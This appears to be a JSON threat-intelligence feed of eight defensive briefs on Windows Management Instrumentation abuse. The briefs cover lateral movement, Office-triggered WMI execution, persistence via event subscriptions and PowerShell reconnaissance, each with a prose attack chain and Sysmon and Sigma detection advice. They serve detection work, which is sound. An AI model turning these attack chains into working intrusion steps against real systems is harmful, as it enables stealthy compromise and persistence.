{"description":"Trending threats, MITRE ATT\u0026CK coverage, and detection metadata — refreshed continuously.","feed_url":"https://feed.craftedsignal.io/tags/wmi/","home_page_url":"https://feed.craftedsignal.io/","items":[{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["medium"],"_cs_tags":["lateral-movement","wmi","windows"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eThe information describes a lateral movement technique leveraging Windows Management Instrumentation (WMI) using a tool named StealthyWMIExec.py. This tool aims to provide a \u0026ldquo;stealthy\u0026rdquo; approach to executing commands on remote systems. The original post on Reddit\u0026rsquo;s blueteamsec forum, dating back to March 2026, discusses a method for achieving lateral movement while potentially bypassing traditional security monitoring that focuses on standard command execution patterns. Defenders should consider that adversaries might try to use WMI for command execution to blend in with legitimate activity and evade detection.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAttacker gains initial access to a system within the target network.\u003c/li\u003e\n\u003cli\u003eAttacker uses valid credentials or exploits a vulnerability to authenticate to a remote host.\u003c/li\u003e\n\u003cli\u003eAttacker uses the StealthyWMIExec.py script (or similar WMI-based execution tool).\u003c/li\u003e\n\u003cli\u003eThe script establishes a WMI connection to the target machine.\u003c/li\u003e\n\u003cli\u003eThe script executes commands on the remote host using WMI\u0026rsquo;s \u003ccode\u003eWin32_Process\u003c/code\u003e class.\u003c/li\u003e\n\u003cli\u003eThe output of the executed command is retrieved via WMI.\u003c/li\u003e\n\u003cli\u003eThe attacker uses the information obtained to further compromise the network or achieve other objectives.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation via WMI-based lateral movement can lead to the compromise of multiple systems within a network. This can lead to data exfiltration, ransomware deployment, or other malicious activities, depending on the attacker\u0026rsquo;s objectives. The use of \u0026ldquo;stealthy\u0026rdquo; techniques may allow attackers to remain undetected for longer periods, increasing the potential damage.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eMonitor WMI event logs (Event ID 5861, 5857, 5858, 5859) for suspicious WMI activity indicative of lateral movement.\u003c/li\u003e\n\u003cli\u003eImplement the Sigma rules provided to detect unusual WMI process creation and script execution.\u003c/li\u003e\n\u003cli\u003eEnable and review process creation logs (Sysmon Event ID 1) with command-line arguments to identify suspicious WMI activity.\u003c/li\u003e\n\u003cli\u003eRestrict WMI access to authorized users and systems only to limit the attack surface for this technique.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-03-16T19:03:04Z","date_published":"2026-03-16T19:03:04Z","id":"/briefs/2024-05-stealthy-wmi-exec/","summary":"The StealthyWMIExec.py script facilitates lateral movement via WMI, potentially evading standard detection mechanisms by employing stealthy techniques.","title":"Stealthy WMI Lateral Movement via StealthyWMIExec.py","url":"https://feed.craftedsignal.io/briefs/2024-05-stealthy-wmi-exec/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["WINWORD.EXE","EXCEL.EXE","POWERPNT.EXE","MSPUB.EXE","MSACCESS.EXE"],"_cs_severities":["medium"],"_cs_tags":["wmi","image load","office","execution"],"_cs_type":"advisory","_cs_vendors":["Microsoft"],"content_html":"\u003cp\u003eThis detection rule identifies suspicious image loading of \u003ccode\u003ewmiutils.dll\u003c/code\u003e from Microsoft Office processes (WINWORD.EXE, EXCEL.EXE, POWERPNT.EXE, MSPUB.EXE, MSACCESS.EXE). Adversaries can use this technique to execute code and evade traditional parent/child processes spawned from Microsoft Office products. This behavior may indicate adversarial activity where child processes are spawned via Windows Management Instrumentation (WMI).\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eUser opens a malicious Microsoft Office document (e.g., Word, Excel).\u003c/li\u003e\n\u003cli\u003eThe document contains a macro or exploit that triggers the execution of WMI commands.\u003c/li\u003e\n\u003cli\u003eThe Office application spawns a WMI process or utilizes existing WMI infrastructure.\u003c/li\u003e\n\u003cli\u003eThe WMI process loads the \u003ccode\u003ewmiutils.dll\u003c/code\u003e library, which is unusual for normal Office operations.\u003c/li\u003e\n\u003cli\u003eThe WMI commands execute malicious code, potentially downloading or executing further payloads.\u003c/li\u003e\n\u003cli\u003eThe attacker establishes persistence through WMI event subscriptions or other methods.\u003c/li\u003e\n\u003cli\u003eThe attacker performs lateral movement using WMI to execute commands on other systems.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation allows attackers to execute arbitrary code, establish persistence, and move laterally within the network, potentially leading to data exfiltration, system compromise, or ransomware deployment. While the number of victims is unknown, this technique can be used in targeted attacks against organizations that heavily rely on Microsoft Office applications.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDeploy the Sigma rule \u0026ldquo;Suspicious WMI Image Load from MS Office\u0026rdquo; to your SIEM and tune for your environment.\u003c/li\u003e\n\u003cli\u003eEnable Sysmon event ID 7 (Image Loaded) logging for comprehensive image load monitoring as suggested in the \u003ca href=\"https://ela.st/sysmon-event-7-setup\"\u003esetup instructions\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003eMonitor process creation events for Microsoft Office applications spawning WMI-related processes (e.g., \u003ccode\u003ewbemtest.exe\u003c/code\u003e, \u003ccode\u003ewmic.exe\u003c/code\u003e) to detect potential WMI abuse.\u003c/li\u003e\n\u003cli\u003eImplement network segmentation to limit lateral movement in case of a successful WMI-based attack.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-09T12:00:00Z","date_published":"2024-01-09T12:00:00Z","id":"/briefs/2024-01-suspicious-wmi-image-load/","summary":"Adversaries may exploit Windows Management Instrumentation (WMI) to execute code stealthily, bypassing traditional security measures by loading `wmiutils.dll` from Microsoft Office applications, potentially indicating malicious execution.","title":"Suspicious WMI Image Load from MS Office","url":"https://feed.craftedsignal.io/briefs/2024-01-suspicious-wmi-image-load/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["Elastic Defend","Microsoft Defender XDR","SentinelOne Cloud Funnel","Sysmon"],"_cs_severities":["medium"],"_cs_tags":["enumeration","wmi","discovery","execution","windows"],"_cs_type":"advisory","_cs_vendors":["Microsoft","Elastic","SentinelOne","Crowdstrike"],"content_html":"\u003cp\u003eAttackers can leverage the Windows Management Instrumentation (WMI) to execute commands for reconnaissance and enumeration within a compromised system. This involves spawning native Windows tools via the WMI Provider Service (WMIPrvSE). This activity is often used to gather system and network information in a stealthy manner, which could be part of a larger attack, such as lateral movement or privilege escalation. This behavior matters because it allows adversaries to gather information about the target environment without using easily detectable methods, potentially leading to further compromise.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eThe attacker gains initial access to a Windows system (e.g., through phishing or exploiting a vulnerability).\u003c/li\u003e\n\u003cli\u003eThe attacker uses WMI to execute a reconnaissance command.\u003c/li\u003e\n\u003cli\u003eWMIPrvSE.exe is invoked to execute the attacker\u0026rsquo;s specified command.\u003c/li\u003e\n\u003cli\u003eThe attacker executes commands such as \u003ccode\u003eipconfig.exe\u003c/code\u003e, \u003ccode\u003enet.exe\u003c/code\u003e, or \u003ccode\u003esysteminfo.exe\u003c/code\u003e via WMIPrvSE.exe to gather network configuration details, user information, and system information.\u003c/li\u003e\n\u003cli\u003eThe enumerated information is collected and potentially exfiltrated to a command and control server.\u003c/li\u003e\n\u003cli\u003eThe attacker uses the gathered information to identify further targets within the network.\u003c/li\u003e\n\u003cli\u003eThe attacker moves laterally to other systems using stolen credentials or exploited vulnerabilities.\u003c/li\u003e\n\u003cli\u003eThe attacker achieves their final objective, such as data exfiltration, ransomware deployment, or persistent access.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful execution of enumeration commands via WMIPrvSE allows attackers to gather sensitive information about the system and network environment. This information can be used to facilitate lateral movement, privilege escalation, and data theft, potentially leading to significant financial loss, reputational damage, and disruption of business operations.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eEnable Sysmon process creation logging to capture the execution of enumeration commands (Data Source: Sysmon).\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rule \u0026ldquo;Enumeration Command Spawned via WMIPrvSE\u0026rdquo; to your SIEM to detect suspicious WMIPrvSE activity (Sigma rule).\u003c/li\u003e\n\u003cli\u003eInvestigate any instances of WMIPrvSE spawning common enumeration tools such as \u003ccode\u003enet.exe\u003c/code\u003e, \u003ccode\u003eipconfig.exe\u003c/code\u003e, or \u003ccode\u003esysteminfo.exe\u003c/code\u003e (Sigma rule).\u003c/li\u003e\n\u003cli\u003eImplement network segmentation to limit the scope of potential lateral movement following successful enumeration (Attack Chain).\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-03T15:00:00Z","date_published":"2024-01-03T15:00:00Z","id":"/briefs/2024-01-wmiprvse-enumeration/","summary":"This rule detects suspicious execution of system enumeration commands by the Windows Management Instrumentation Provider Service (WMIPrvSE), indicating potential reconnaissance or malicious activity on Windows systems.","title":"Suspicious Enumeration Commands Spawned via WMIPrvSE","url":"https://feed.craftedsignal.io/briefs/2024-01-wmiprvse-enumeration/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["HPWBEM","SCCM","Windows Management Instrumentation",".NET Framework"],"_cs_severities":["medium"],"_cs_tags":["lateral-movement","wmi","windows"],"_cs_type":"advisory","_cs_vendors":["Microsoft","HP","Nessus"],"content_html":"\u003cp\u003eThis threat brief focuses on the detection of lateral movement within a Windows environment via Windows Management Instrumentation (WMI). WMI, a core Windows feature, is often exploited by adversaries to remotely execute processes, bypassing traditional security measures. This activity is detected by monitoring network connections and process executions, while filtering out common false positives associated with legitimate administrative use, security tools, and system processes. The goal is to highlight potential threats indicative of unauthorized lateral movement.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAn attacker gains initial access to a system within the network.\u003c/li\u003e\n\u003cli\u003eThe attacker uses WMI to initiate a connection to a remote host on port 135.\u003c/li\u003e\n\u003cli\u003eThe svchost.exe process on the target host accepts an incoming RPC connection from the attacker-controlled system.\u003c/li\u003e\n\u003cli\u003eWmiPrvSE.exe, the WMI provider host process, spawns a new process based on the attacker\u0026rsquo;s WMI command.\u003c/li\u003e\n\u003cli\u003eThe spawned process executes the attacker\u0026rsquo;s payload or command on the remote host.\u003c/li\u003e\n\u003cli\u003eThe attacker leverages the executed process for further actions, such as data exfiltration or establishing persistence.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation and lateral movement via WMI can lead to unauthorized access to sensitive data, compromise of critical systems, and propagation of malware throughout the network. While specific victim counts or sector targeting data are unavailable, the broad applicability of WMI across Windows environments makes this a relevant threat for a wide range of organizations.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eEnable Sysmon Event ID 1 (Process Creation) and Event ID 3 (Network Connection) logging to provide necessary data for the rules below.\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rules provided in this brief to your SIEM to detect suspicious WMI activity and tune them for your environment.\u003c/li\u003e\n\u003cli\u003eReview and create exceptions for known administrative accounts or specific IP addresses used by IT staff to reduce false positives, as mentioned in the overview.\u003c/li\u003e\n\u003cli\u003eIsolate any affected host from the network to prevent further lateral movement if suspicious WMI activity is detected.\u003c/li\u003e\n\u003cli\u003eMonitor network connections with destination port 135 for unusual activity.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-03T12:00:00Z","date_published":"2024-01-03T12:00:00Z","id":"/briefs/2024-01-03-wmi-lateral-movement/","summary":"Detection of processes executed via Windows Management Instrumentation (WMI) on a remote host indicating potential adversary lateral movement.","title":"WMI Incoming Lateral Movement","url":"https://feed.craftedsignal.io/briefs/2024-01-03-wmi-lateral-movement/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["Sysmon"],"_cs_severities":["medium"],"_cs_tags":["windows","wmi","script_execution","initial_access","execution"],"_cs_type":"advisory","_cs_vendors":["Microsoft"],"content_html":"\u003cp\u003eThis detection identifies the use of Windows script interpreters (cscript.exe or wscript.exe) to execute processes via Windows Management Instrumentation (WMI). Adversaries exploit WMI to execute scripts or processes stealthily, often using script interpreters. The rule monitors for these interpreters executing processes via WMI, specifically when initiated by non-system accounts, indicating potential malicious intent. The detection focuses on identifying scenarios where \u003ccode\u003ewmiutils.dll\u003c/code\u003e is loaded by \u003ccode\u003ewscript.exe\u003c/code\u003e or \u003ccode\u003ecscript.exe\u003c/code\u003e, followed by \u003ccode\u003ewmiprvse.exe\u003c/code\u003e spawning a new process. This is often associated with malicious initial access or execution techniques.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAn attacker gains initial access via phishing (T1566) or other means.\u003c/li\u003e\n\u003cli\u003eThe attacker leverages a script, such as VBScript or JavaScript (T1059.005, T1059.007), to execute commands using WMI.\u003c/li\u003e\n\u003cli\u003eThe script interpreter (\u003ccode\u003ecscript.exe\u003c/code\u003e or \u003ccode\u003ewscript.exe\u003c/code\u003e) loads \u003ccode\u003ewmiutils.dll\u003c/code\u003e to interact with WMI.\u003c/li\u003e\n\u003cli\u003eThe WMI Provider Host process (\u003ccode\u003ewmiprvse.exe\u003c/code\u003e) is invoked as a parent process, triggered by the script execution.\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003ewmiprvse.exe\u003c/code\u003e executes a secondary process, such as \u003ccode\u003epowershell.exe\u003c/code\u003e, \u003ccode\u003ecmd.exe\u003c/code\u003e, or other executables, often from unusual locations like \u003ccode\u003eC:\\\\Users\\\\\u003c/code\u003e or \u003ccode\u003eC:\\\\ProgramData\\\\\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eThe executed process performs malicious actions, such as downloading additional payloads or establishing persistence.\u003c/li\u003e\n\u003cli\u003eThe attacker attempts to maintain persistence by creating scheduled tasks or modifying registry keys.\u003c/li\u003e\n\u003cli\u003eThe ultimate objective is often lateral movement, data exfiltration, or deploying ransomware.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation allows attackers to execute arbitrary code, bypass security controls, and establish persistence on the compromised system. The use of WMI enables stealthy execution, making detection challenging. The impact can range from data theft and system compromise to full network takeover. In some cases, threat actors may deploy ransomware, leading to significant financial losses and operational disruption.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eEnable Sysmon Event ID 1 (Process Creation) and Event ID 7 (Image Loaded) logging to provide the necessary data for the provided Sigma rules.\u003c/li\u003e\n\u003cli\u003eDeploy the provided Sigma rule \u0026ldquo;WMI Scripting Process Creation\u0026rdquo; to detect suspicious process creation events originating from \u003ccode\u003ewmiprvse.exe\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eInvestigate any alerts generated by the provided Sigma rule \u0026ldquo;WMI Scripting Process Creation\u0026rdquo; with a focus on processes spawned by wmiprvse.exe from unusual locations or with suspicious command-line arguments.\u003c/li\u003e\n\u003cli\u003eImplement endpoint protection policies to block or alert on the execution of high-risk processes when initiated by non-system accounts as mentioned in the overview.\u003c/li\u003e\n\u003cli\u003eRegularly review and update endpoint protection policies to block or alert on the execution of high-risk processes like those listed in the detection query, especially when initiated by non-system accounts.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-03T12:00:00Z","date_published":"2024-01-03T12:00:00Z","id":"/briefs/2024-01-wmi-script-execution/","summary":"The rule identifies the use of Windows script interpreters (cscript.exe or wscript.exe) executing a process via Windows Management Instrumentation (WMI), which may indicate malicious activity, especially when initiated by non-system accounts.","title":"Windows Script Interpreter Executing Process via WMI","url":"https://feed.craftedsignal.io/briefs/2024-01-wmi-script-execution/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["Microsoft Defender XDR","Sysmon","Elastic Defend","Elastic Endpoint Security","CrowdStrike Falcon","SentinelOne Cloud Funnel","Windows Security Event Logs","winlogbeat"],"_cs_severities":["medium"],"_cs_tags":["persistence","execution","windows","wmi"],"_cs_type":"advisory","_cs_vendors":["Microsoft","Crowdstrike","SentinelOne","Elastic"],"content_html":"\u003cp\u003eWindows Management Instrumentation (WMI) provides a powerful framework for managing Windows systems, but adversaries can abuse its capabilities to establish persistence. By creating WMI event subscriptions, attackers can execute arbitrary code in response to defined system events. This technique involves creating event filters, providers, consumers, and bindings that automatically run malicious code. This can be achieved through tools like \u003ccode\u003ewmic.exe\u003c/code\u003e, which allows the creation of event consumers such as \u003ccode\u003eActiveScriptEventConsumer\u003c/code\u003e or \u003ccode\u003eCommandLineEventConsumer\u003c/code\u003e. Successful exploitation of WMI for persistence allows attackers to maintain unauthorized access to a compromised system, even after reboots or other system changes. This activity has been observed across various environments, highlighting the need for robust detection mechanisms to identify and prevent WMI-based persistence.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAn attacker gains initial access to a Windows system through unspecified means.\u003c/li\u003e\n\u003cli\u003eThe attacker uses \u003ccode\u003ewmic.exe\u003c/code\u003e to create a WMI event filter that defines a specific event to monitor.\u003c/li\u003e\n\u003cli\u003eA WMI event consumer, such as \u003ccode\u003eActiveScriptEventConsumer\u003c/code\u003e or \u003ccode\u003eCommandLineEventConsumer\u003c/code\u003e, is created using \u003ccode\u003ewmic.exe\u003c/code\u003e specifying the malicious code or script to execute when the event occurs.\u003c/li\u003e\n\u003cli\u003eA WMI binding is established between the event filter and the event consumer using \u003ccode\u003ewmic.exe\u003c/code\u003e, linking the event to the action.\u003c/li\u003e\n\u003cli\u003eThe malicious WMI event subscription is activated, monitoring for the defined event.\u003c/li\u003e\n\u003cli\u003eWhen the specified event occurs, the WMI service triggers the execution of the associated malicious code or script through the event consumer.\u003c/li\u003e\n\u003cli\u003eThe attacker gains persistent access to the system, as the WMI event subscription will re-activate after reboots.\u003c/li\u003e\n\u003cli\u003eThe attacker can then perform additional malicious activities, such as lateral movement or data exfiltration.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of WMI for persistence can allow an attacker to maintain long-term, unauthorized access to a compromised system. This can result in data theft, system compromise, and further malicious activities. While the exact number of victims is not specified in the source, the broad applicability of this technique means that many Windows systems are potentially at risk. If the attack succeeds, the attacker gains a foothold on the system that is difficult to detect and remove, which can lead to significant operational disruption and financial loss.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eEnable process creation logging and monitor for \u003ccode\u003ewmic.exe\u003c/code\u003e with command-line arguments related to creating event consumers, specifically \u003ccode\u003eActiveScriptEventConsumer\u003c/code\u003e or \u003ccode\u003eCommandLineEventConsumer\u003c/code\u003e, to trigger the Sigma rule \u0026ldquo;Detect Suspicious WMIC Process\u0026rdquo;.\u003c/li\u003e\n\u003cli\u003eDeploy the provided Sigma rule to your SIEM to detect suspicious WMI event subscription creation.\u003c/li\u003e\n\u003cli\u003eReview the investigation steps outlined in the provided documentation to triage and analyze potential WMI persistence attempts.\u003c/li\u003e\n\u003cli\u003eMonitor Windows Security Event Logs and Sysmon for events related to WMI activity for broader coverage.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-03T12:00:00Z","date_published":"2024-01-03T12:00:00Z","id":"/briefs/2024-01-wmi-persistence/","summary":"Adversaries can leverage Windows Management Instrumentation (WMI) to establish persistence by creating event subscriptions that trigger malicious code execution when specific events occur, using tools like wmic.exe to create event consumers.","title":"Persistence via WMI Event Subscription","url":"https://feed.craftedsignal.io/briefs/2024-01-wmi-persistence/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["Elastic Defend"],"_cs_severities":["medium"],"_cs_tags":["persistence","wmi","windows","event-subscription"],"_cs_type":"advisory","_cs_vendors":["Microsoft","Elastic"],"content_html":"\u003cp\u003eAttackers abuse Windows Management Instrumentation (WMI) event subscriptions to establish persistence on compromised systems. By creating WMI event subscriptions that trigger malicious actions based on system events, adversaries can ensure their code executes automatically. This technique is particularly effective because WMI is a legitimate system administration tool, making malicious activity harder to detect. This rule focuses on detecting suspicious WMI event consumers, specifically \u003ccode\u003eCommandLineEventConsumer\u003c/code\u003e and \u003ccode\u003eActiveScriptEventConsumer\u003c/code\u003e. The detection leverages Sysmon event code 21 and endpoint API events related to \u003ccode\u003eIWbemServices::PutInstance\u003c/code\u003e calls. The timeframe for the rule is set to look back 9 minutes.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAttacker gains initial access to the system (e.g., via phishing or exploiting a vulnerability).\u003c/li\u003e\n\u003cli\u003eThe attacker uses PowerShell or another scripting language to interact with the WMI service.\u003c/li\u003e\n\u003cli\u003eThe attacker creates a new WMI event filter to monitor for a specific system event.\u003c/li\u003e\n\u003cli\u003eThe attacker creates a WMI event consumer, such as \u003ccode\u003eCommandLineEventConsumer\u003c/code\u003e or \u003ccode\u003eActiveScriptEventConsumer\u003c/code\u003e, to execute a malicious payload.\u003c/li\u003e\n\u003cli\u003eThe attacker links the event filter and consumer by creating a WMI event subscription.\u003c/li\u003e\n\u003cli\u003eThe malicious WMI event subscription persists across reboots.\u003c/li\u003e\n\u003cli\u003eWhen the specified event occurs, the malicious consumer executes the attacker\u0026rsquo;s payload.\u003c/li\u003e\n\u003cli\u003eThe attacker maintains persistent access and can perform further malicious activities, such as data exfiltration or lateral movement.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation allows attackers to maintain persistent access to the compromised system, even after reboots or other system changes. This can lead to long-term data theft, system compromise, or the deployment of ransomware. While the number of victims is unknown, this technique can be used against a wide range of Windows systems.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eEnable Sysmon WMI event logging to capture event code 21, which is crucial for detecting WMI event subscription creation.\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rule \u0026ldquo;Detect Suspicious WMI Event Subscription Creation\u0026rdquo; to your SIEM to identify potentially malicious WMI activity.\u003c/li\u003e\n\u003cli\u003eInvestigate any process associated with the \u003ccode\u003eIWbemServices::PutInstance\u003c/code\u003e API call, particularly those using \u003ccode\u003eCommandLineEventConsumer\u003c/code\u003e or \u003ccode\u003eActiveScriptEventConsumer\u003c/code\u003e, as indicated in the Attack Chain section.\u003c/li\u003e\n\u003cli\u003eMonitor for processes or activities around the time of the event to identify potential lateral movement or further persistence mechanisms as outlined in the overview.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-03T12:00:00Z","date_published":"2024-01-03T12:00:00Z","id":"/briefs/2024-01-wmi-event-subscription/","summary":"This threat brief details the detection of malicious Windows Management Instrumentation (WMI) event subscriptions, a technique used by attackers for persistence and privilege escalation on Windows systems.","title":"Detect Suspicious WMI Event Subscription Creation for Persistence","url":"https://feed.craftedsignal.io/briefs/2024-01-wmi-event-subscription/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["Splunk Enterprise","Splunk Enterprise Security","Splunk Cloud"],"_cs_severities":["high"],"_cs_tags":["powershell","wmi","reconnaissance","lateral_movement","windows"],"_cs_type":"advisory","_cs_vendors":["Splunk"],"content_html":"\u003cp\u003eThis brief focuses on detecting reconnaissance activities performed through PowerShell using WMI queries. Adversaries often use WMI to gather detailed information about a compromised system, including hardware specifications, operating system details, and installed software. This information can be used to plan further attacks, such as privilege escalation or lateral movement. This detection leverages PowerShell Script Block Logging (EventCode 4104) to identify specific WMI queries that target system information classes like \u003ccode\u003eWin32_Bios\u003c/code\u003e, \u003ccode\u003eWin32_OperatingSystem\u003c/code\u003e, \u003ccode\u003eWin32_Processor\u003c/code\u003e and others. Identifying this behavior early can help defenders disrupt attack chains before significant damage occurs. The analytic is based on the detection logic from the Splunk Security Content project as of April 2026.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAn attacker gains initial access to the target system, potentially through phishing or exploiting a software vulnerability.\u003c/li\u003e\n\u003cli\u003eThe attacker executes a PowerShell script, either directly or via a command-line interpreter like \u003ccode\u003ecmd.exe\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eThe PowerShell script uses the \u003ccode\u003eGet-WmiObject\u003c/code\u003e cmdlet or a direct WMI query with \u003ccode\u003eSELECT\u003c/code\u003e to query system information.\u003c/li\u003e\n\u003cli\u003eSpecific WMI classes are targeted, including \u003ccode\u003eWin32_Bios\u003c/code\u003e, \u003ccode\u003eWin32_OperatingSystem\u003c/code\u003e, \u003ccode\u003eWin32_Processor\u003c/code\u003e, \u003ccode\u003eWin32_ComputerSystem\u003c/code\u003e, \u003ccode\u003eWin32_PnPEntity\u003c/code\u003e, \u003ccode\u003eWin32_ShadowCopy\u003c/code\u003e, \u003ccode\u003eWin32_DiskDrive\u003c/code\u003e, \u003ccode\u003eWin32_PhysicalMemory\u003c/code\u003e, \u003ccode\u003eWin32_BaseBoard\u003c/code\u003e, and \u003ccode\u003eWin32_DisplayConfiguration\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eThe script collects the data returned by the WMI queries.\u003c/li\u003e\n\u003cli\u003eThe gathered information is used to profile the system and identify potential vulnerabilities or weaknesses.\u003c/li\u003e\n\u003cli\u003eThe attacker uses the gathered information to plan subsequent stages of the attack, like lateral movement or privilege escalation.\u003c/li\u003e\n\u003cli\u003eThe attacker executes further commands based on the gathered information.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful reconnaissance can provide attackers with a comprehensive understanding of the target environment, enabling them to tailor their attacks for maximum impact. This can lead to successful privilege escalation, lateral movement, data exfiltration, or ransomware deployment. Organizations that fail to detect and prevent reconnaissance activities are at a higher risk of experiencing significant data breaches and financial losses. The Maze ransomware group, Industroyer2, and LockBit ransomware have been observed using similar reconnaissance techniques.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eEnable PowerShell Script Block Logging on all endpoints to capture the necessary data for detection (\u003ca href=\"https://help.splunk.com/en/security-offerings/splunk-user-behavior-analytics/get-data-in/5.4.1/add-other-data-to-splunk-uba/configure-powershell-logging-to-see-powershell-anomalies-in-splunk-uba.\"\u003ePowerShell Script Block Logging 4104\u003c/a\u003e).\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rule \u003ccode\u003eDetect Suspicious WMI Reconnaissance via PowerShell\u003c/code\u003e to identify PowerShell scripts querying sensitive WMI classes.\u003c/li\u003e\n\u003cli\u003eInvestigate any alerts generated by the Sigma rule, focusing on the user and process context to determine potential malicious intent.\u003c/li\u003e\n\u003cli\u003eReview and tune the \u003ccode\u003eRecon Using WMI Class\u003c/code\u003e detection filter (\u003ccode\u003erecon_using_wmi_class_filter\u003c/code\u003e) to reduce false positives in your environment.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-02T12:00:00Z","date_published":"2024-01-02T12:00:00Z","id":"/briefs/2024-01-wmi-reconnaissance/","summary":"Detection of suspicious PowerShell activity using Windows Management Instrumentation (WMI) to gather system information, indicative of reconnaissance efforts by adversaries potentially leading to further exploitation or lateral movement.","title":"Suspicious PowerShell Reconnaissance via WMI Queries","url":"https://feed.craftedsignal.io/briefs/2024-01-wmi-reconnaissance/"}],"language":"en","title":"CraftedSignal Threat Feed — Wmi","version":"https://jsonfeed.org/version/1.1"}